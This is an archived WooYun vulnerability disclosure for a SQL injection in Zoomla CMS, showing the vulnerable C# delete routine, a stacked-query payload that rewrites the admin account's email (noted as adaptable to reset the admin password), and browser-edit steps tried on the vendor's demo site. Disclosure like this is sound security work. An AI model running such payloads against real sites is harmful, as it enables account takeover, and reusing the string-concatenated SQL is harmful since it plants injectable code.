乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-15: 细节已通知厂商并且等待厂商处理中 2014-05-20: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-07-14: 细节向核心白帽子及相关领域专家公开 2014-07-24: 细节向普通白帽子公开 2014-08-03: 细节向实习白帽子公开 2014-08-10: 细节向公众公开
话说 上次提交直接给忽略 那只好拿官方Demo做测试 另外此洞在2008年就已经存在
此问题为UPdate类型文件/user/usershop/StockList.aspx 问题参数 Item问题代码如下
protected void Button3_Click(object sender, EventArgs e) { string text = base.Request.Form["Item"]; if (!string.IsNullOrEmpty(text) && this.bll.delstock(text))------------------此处 { base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>"); return; } base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>"); } public bool delstock(string str){ string strSql = "delete from ZL_UserStock where (id in (" + str + "))"; return SqlHelper.ExecuteSql(strSql, null);}
构造参数
0))update ZL_User set Email='wooyun' where username='admin'-- //修改用户email YY此处可以更改为修改管理员密码
过程 登陆后访问http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111firebug修改页面<table>内容图:
内容如下:
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;background-color: white;" class="border"> <tbody><tr align="center" style="background:#FFBD59"> <td width="5%" class="title"><input type="checkbox" onclick="javascript:CheckAll(this);" name="Checkall" id="Checkall"></td> <td width="13%" class="title">单据类型</td> <td width="20%" class="title">单据编号</td> <td width="15%" class="title"> 录入时间</td> <td width="12%" class="title"> 录入者</td> <td width="20%" class="title"> 备注</td> <td width="15%" class="title"> 操作</td> </tr> <tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg"> <td height="22" align="center"><input type="checkbox" value="3" name="Item"></td> <td height="22" align="center">出库</td> <td height="22" align="center">订单</td> <td height="22" align="center">2014/5/14 21:54:09</td> <td height="22" align="center">admin</td> <td height="22" align="center">好家伙</td> <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=3">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=3">删除</a></td> </tr> <tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg"> <td height="22" align="center"><input type="checkbox" value="2" name="Item"></td> <td height="22" align="center">出库</td> <td height="22" align="center">订单</td> <td height="22" align="center">2014/5/14 21:54:09</td> <td height="22" align="center">admin</td> <td height="22" align="center">好家伙</td> <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=2">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=2">删除</a></td> </tr> <tr class="tdbg"> <td height="22" align="center" class="tdbgleft" colspan="10">共 <span id="Allnum">2</span> 条记录 <span id="Toppage"><a href="?Stocktype=0&Currentpage=0">首页</a></span> <span class="aspNetDisabled" id="Nextpage"><a href="?Stocktype=0&Currentpage=0">上一页</a></span> <span class="aspNetDisabled" id="Downpage"><a href="?Stocktype=0&Currentpage=1">下一页</a></span> <span id="Endpage"><a href="?Stocktype=0&Currentpage=1">尾页</a></span> 页次:<span id="Nowpage">1</span>/<span id="PageSize">1</span>页 <span id="pagess">10</span>条记录/页 转到第<select id="DropDownList1" onchange="javascript:setTimeout('__doPostBack(\'DropDownList1\',\'\')', 0)" name="DropDownList1"> <option value="1">1</option></select>页</td> </tr> </tbody></table>
修改复选框中的value
然后点击删除按钮即可
本地下载的 CMS2 V1.3 V1.4 V1.5、 CMS6.0均受影响另外 从最早的一个文件来看此洞在2008年就已经存在
找程序猿
危害等级:无影响厂商忽略
忽略时间:2014-08-10 11:50
暂无